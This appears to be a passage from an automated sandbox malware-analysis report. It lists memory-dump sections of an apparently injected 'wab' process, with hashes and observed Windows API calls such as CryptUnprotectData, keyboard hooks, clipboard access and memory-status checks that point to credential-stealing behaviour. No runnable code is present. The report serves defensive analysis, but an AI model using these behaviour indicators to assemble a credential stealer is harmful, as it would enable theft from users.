                                                                                    • Instruction Fuzzy Hash: BCD0523059220FDAEB018A84C2297AE7AB0BB30209F310808E002B2281EBB40649CA92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:13%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:284
                                                                                    Total number of Limit Nodes:34
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,F^$$F^$
                                                                                    • API String ID: 0-2118841712
                                                                                    • Opcode ID: 5336b52ca68b093a49fd63cbec837a27b83ee1ff90bb43e1eb4b7c31a6f6a7c6
                                                                                    • Instruction ID: 708ebd4083d523209c4cdae1027b00b4da9316b9ecb4a858cb7a0b782287c152
                                                                                    • Opcode Fuzzy Hash: 5336b52ca68b093a49fd63cbec837a27b83ee1ff90bb43e1eb4b7c31a6f6a7c6
                                                                                    • Instruction Fuzzy Hash: A2D25C30A00226CFDB15DF68C494A9DB7B2FF85314F6089AAD449AB365DB74ED85CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (\^$$(\^$
                                                                                    • API String ID: 0-505694876
                                                                                    • Opcode ID: ce9743af03635d35a70b32016f8d656625e3f94c657a85100d2899ed9e2c4f1c
                                                                                    • Instruction ID: f6591b96c43649a81cf0054c2e286c2fb266084b1e4ab7cc5211ecca2e4a87b3
                                                                                    • Opcode Fuzzy Hash: ce9743af03635d35a70b32016f8d656625e3f94c657a85100d2899ed9e2c4f1c
                                                                                    • Instruction Fuzzy Hash: 10525070E0021A8BDB15DFACD49079DBBB3FB85310F20492AE605EB356EA74DD818B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DR^$
                                                                                    • API String ID: 0-1110539939
                                                                                    • Opcode ID: f76a5640658c31ea9788496889388b78996804c60e24d5090b3f488f63fa2a9d
                                                                                    • Instruction ID: c2d6c61db869422ae05a8644105c39b33d3a0798b9a343540888b7c26c934314
                                                                                    • Opcode Fuzzy Hash: f76a5640658c31ea9788496889388b78996804c60e24d5090b3f488f63fa2a9d
                                                                                    • Instruction Fuzzy Hash: 0C028E30B012268FDB05DF68D894A9EB7F3FF84310F148969D905AB395DB75ED428BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 24C80A75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 50fa6e90806a9247c4f0a669ecd59a83a1dde1f94fd0eadf5a3a202d0a31a3cf
                                                                                    • Instruction ID: b4176f783a56666532b53f33e9d4a82555254221b240c5dbe22c647c03799cce
                                                                                    • Opcode Fuzzy Hash: 50fa6e90806a9247c4f0a669ecd59a83a1dde1f94fd0eadf5a3a202d0a31a3cf
                                                                                    • Instruction Fuzzy Hash: 0C1144B2800249DFCB11CF9AC941BEEBFF5EF48320F108429E614A7210C379A950CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 24C80A75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 1f5505d673167c44b79e79375dec595d6af480818e859c790871f92b205c7c3b
                                                                                    • Instruction ID: 4215e1c6e01049e01c4bcae28d35ee3fffee00cb794154f634568923ca9cca65
                                                                                    • Opcode Fuzzy Hash: 1f5505d673167c44b79e79375dec595d6af480818e859c790871f92b205c7c3b
                                                                                    • Instruction Fuzzy Hash: 371134B2800249DFDB11CF9AD941BDEBFF4EF58320F108419E628A7210D379A655CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 833c9a55bb009b85565161dcfff491941557b3ce3e308b07d1844ca08e7ffffb
                                                                                    • Instruction ID: 6b002b9adcd8cd57de314b9733e7eaee76989be083dbaf1e3225da0f6e666fd3
                                                                                    • Opcode Fuzzy Hash: 833c9a55bb009b85565161dcfff491941557b3ce3e308b07d1844ca08e7ffffb
                                                                                    • Instruction Fuzzy Hash: D5625C34B002168FDB05EF68C594A9DB7B3EF88714F148869E846EB395DB75ED42CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feec0375c75381c576d6cb54def798291f583b8b4e66f088b2d36ce1ce21a608
                                                                                    • Instruction ID: 0b0542362f86da622345e4c5d45c4b68a5f627fe417582e65e574068de1239cd
                                                                                    • Opcode Fuzzy Hash: feec0375c75381c576d6cb54def798291f583b8b4e66f088b2d36ce1ce21a608
                                                                                    • Instruction Fuzzy Hash: 2C325D34B002168FDB15DF6CD880AAEB7B3FB89714F108929E905E7355DB79DD428B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 966a04dee18853535f2973dee0baf5ce194cb89a6168ce48c3ca7a3478b2f566
                                                                                    • Instruction ID: e1a7979bc9d3f744ca274dd1780475d4d3aa54aecae82393d2842f30f8227ba6
                                                                                    • Opcode Fuzzy Hash: 966a04dee18853535f2973dee0baf5ce194cb89a6168ce48c3ca7a3478b2f566
                                                                                    • Instruction Fuzzy Hash: CA22A171F002668FDB11DFA8D48069EBBB3FF89320F248469D946AB345DA35DD42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89DEE
                                                                                    • GetCurrentThread.KERNEL32 ref: 24C89E2B
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89E68
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 24C89EC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: 5f7686167965e4106dbf38161c570c9d49a0a2edf3a8a6d637a26ababdbe4f75
                                                                                    • Instruction ID: d99406dd17c8449a108c15f4d48ab01144fc120844e1ced39b849aec304bbc8e
                                                                                    • Opcode Fuzzy Hash: 5f7686167965e4106dbf38161c570c9d49a0a2edf3a8a6d637a26ababdbe4f75
                                                                                    • Instruction Fuzzy Hash: 605137B19043499FDB09DFA9D588BAEBFF1FF88314F208459D009A7291DB749940CB66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89DEE
                                                                                    • GetCurrentThread.KERNEL32 ref: 24C89E2B
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89E68
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 24C89EC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: 31cae9709d015d966374e9f22db7d055bf947175dbd933ef01bbdc708874a4fd
                                                                                    • Instruction ID: 7698aa9a23cd631516f84aae0d653db1009ab74147c7e9a68f883abef0913fee
                                                                                    • Opcode Fuzzy Hash: 31cae9709d015d966374e9f22db7d055bf947175dbd933ef01bbdc708874a4fd
                                                                                    • Instruction Fuzzy Hash: BD5129B09007499FDB49DFADD548BAEBFF1EF88314F208559D009A7390DB749940CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 24C8AF09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID: ,!
                                                                                    • API String ID: 2714655100-1623472995
                                                                                    • Opcode ID: e7004734325548e388dd44c4fa416491898e2470f4173d7ea0a525aee5eeacf1
                                                                                    • Instruction ID: 5bb599ffde566c6c8d1303a1b3ddce413241d4074cff77bca4c5fb60fe2611b7
                                                                                    • Opcode Fuzzy Hash: e7004734325548e388dd44c4fa416491898e2470f4173d7ea0a525aee5eeacf1
                                                                                    • Instruction Fuzzy Hash: 4C413BB5900305CFDB05CF59C484B9ABBF5FF88314F248859E519A7361D775A841CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1^$$@1^$
                                                                                    • API String ID: 0-216816597
                                                                                    • Opcode ID: 33cfb1f25dba4ab2e29c8b9cf42c3d14e204b99744a46da0e7728bf7d8c515fb
                                                                                    • Instruction ID: 9ec554791fe108688ca69f05bfdc4d42cbc9e30e2179804353af85b54439af7b
                                                                                    • Opcode Fuzzy Hash: 33cfb1f25dba4ab2e29c8b9cf42c3d14e204b99744a46da0e7728bf7d8c515fb
                                                                                    • Instruction Fuzzy Hash: C8316F35E002269BCB05CFA5C89869EB7F3BF89310F108529E906EB354DB75AD428B40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1^$$@1^$
                                                                                    • API String ID: 0-216816597
                                                                                    • Opcode ID: 7073954353842b63550b42a51bef4492a10456ec2ff4a7b08481a61d322664e6
                                                                                    • Instruction ID: ad583a7a9d640ef2253ae07519dd65a53cbb86e02ba9dfd808f64af59e8b9d56
                                                                                    • Opcode Fuzzy Hash: 7073954353842b63550b42a51bef4492a10456ec2ff4a7b08481a61d322664e6
                                                                                    • Instruction Fuzzy Hash: 06313035F002269BCB05CFA9C894A9EB7B3BF89300F208519E916EB354DB75AD46CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 101d29762b152d1dba29b49a4e442ec83580aff664c2c84f3e46850fe115b802
                                                                                    • Instruction ID: ccf32c9b993abd0f96b63891e8389352dda98e0637b3aea33a4224c4da1151da
                                                                                    • Opcode Fuzzy Hash: 101d29762b152d1dba29b49a4e442ec83580aff664c2c84f3e46850fe115b802
                                                                                    • Instruction Fuzzy Hash: 06B18D75A007059FDB06DF79C884A6EBBF2FF88218B00896DD40ADB755EB74E901CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DR^$
                                                                                    • API String ID: 0-1110539939
                                                                                    • Opcode ID: 90a5125568e0dba4c1f8bfb7739b08342ec1b9069550cf94c678a08ac76656b6
                                                                                    • Instruction ID: 88d44bb1cb64e3255194ca74baf57a92e23c7503d6bbfa4bc43a689a6e83d116
                                                                                    • Opcode Fuzzy Hash: 90a5125568e0dba4c1f8bfb7739b08342ec1b9069550cf94c678a08ac76656b6
                                                                                    • Instruction Fuzzy Hash: 3EE17F70F0021A8BDB19DF69D88469EBBB3FF88304F208929D905EB345DB759D42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef3793240b4e0543d1ade10356afcdd7cd615d6c3fe564e3ead469deb2b73691
                                                                                    • Instruction ID: 8a79db501790afbc2ed08443625e14422a0bdd7b2e18b3f6298c9801f8e97eaa
                                                                                    • Opcode Fuzzy Hash: ef3793240b4e0543d1ade10356afcdd7cd615d6c3fe564e3ead469deb2b73691
                                                                                    • Instruction Fuzzy Hash: 9E41E272E047598FCB14DFBAE4047EEBBF1AF89310F14856AD948A7241EB749845CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24C8636A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 2412aa2d21b4c546a0efa3ca24cab14b5a66abee173c6f18e62bdc749f7f3618
                                                                                    • Instruction ID: d120b37295f587623e508bdce2bd4a8189eaec63e77c5321a107441b60deeeaf
                                                                                    • Opcode Fuzzy Hash: 2412aa2d21b4c546a0efa3ca24cab14b5a66abee173c6f18e62bdc749f7f3618
                                                                                    • Instruction Fuzzy Hash: 3351DFB1D00309DFDB15CFAAD880ADEBFB2BF48714F20852AE818AB210D7749845CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24C8636A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 2d11fd963e0fa9b103dba9a8bea5eaf484e287ddebba75d0c7ea02474956fb21
                                                                                    • Instruction ID: f00b461038830224247d25b79efed6412a588de2fbd5b699fec6828dc6e60e1d
                                                                                    • Opcode Fuzzy Hash: 2d11fd963e0fa9b103dba9a8bea5eaf484e287ddebba75d0c7ea02474956fb21
                                                                                    • Instruction Fuzzy Hash: 4941C0B1D00309DFDB15CF9AD984ADEBFB6BF48714F20812AE818AB210D7759845CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: a8269a47cfd9b1ce9fdc3a74b5fdf4e552e98f07c315db8128b19b3bd3888bbd
                                                                                    • Instruction ID: ca8579cc4b5bb538ad9088261f5bf5c0484f164365a0458249fbbb999d3c5306
                                                                                    • Opcode Fuzzy Hash: a8269a47cfd9b1ce9fdc3a74b5fdf4e552e98f07c315db8128b19b3bd3888bbd
                                                                                    • Instruction Fuzzy Hash: 863102B0E01248DFDB11CFA9C984BDEBBF1AF58714F208059E518AB390DBB4A845CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: fa50a38f482e3c58633569142b3e884fafbf3ed9821fd90ae884840d4c62520f
                                                                                    • Instruction ID: 1604cfbfc70ea6aca1c5d2f9ee8c953a35e62f9326840c3a7ad3d02bb9421278
                                                                                    • Opcode Fuzzy Hash: fa50a38f482e3c58633569142b3e884fafbf3ed9821fd90ae884840d4c62520f
                                                                                    • Instruction Fuzzy Hash: 4531E2B0D0120CDFDB11CF99C984B9EBBF6BF48714F208059E504AB394EBB4A845CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 24C8A03F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c05b7055a21575bcb5a313d6fd611d0ae5019f4e75dd542c20092cd15015f856
                                                                                    • Instruction ID: 60d49bb14e189e07450efced6bbf613c80c380e6cc76c201dbec378d0968ef9d
                                                                                    • Opcode Fuzzy Hash: c05b7055a21575bcb5a313d6fd611d0ae5019f4e75dd542c20092cd15015f856
                                                                                    • Instruction Fuzzy Hash: 282103B59002489FDB10CFAAD585ADEBFF4FF48320F10841AE958A7310D379A950CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 24C8A03F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 08ce46c1f5a7739a760de0d4d304ae0d907b7edf725f746164f83ab78da6cb99
                                                                                    • Instruction ID: 9591879ddade9490e5064ce80a0cb8f6d6688f7574348c39ab6aff7582f3df79
                                                                                    • Opcode Fuzzy Hash: 08ce46c1f5a7739a760de0d4d304ae0d907b7edf725f746164f83ab78da6cb99
                                                                                    • Instruction Fuzzy Hash: 1921E3B59002099FDB10CFAAD984ADEBBF4FB48320F10801AE914A3350D379A950CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 24C8D74B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 24C8D74B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,027CEBBA), ref: 027CECA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,027CEBBA), ref: 027CECA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 24C85216
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 24C8BA9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 24C8BA9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,24C8B155), ref: 24C8B1DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,24C8B155), ref: 24C8B1DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: b_$
                                                                                    • API String ID: 0-366904666
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
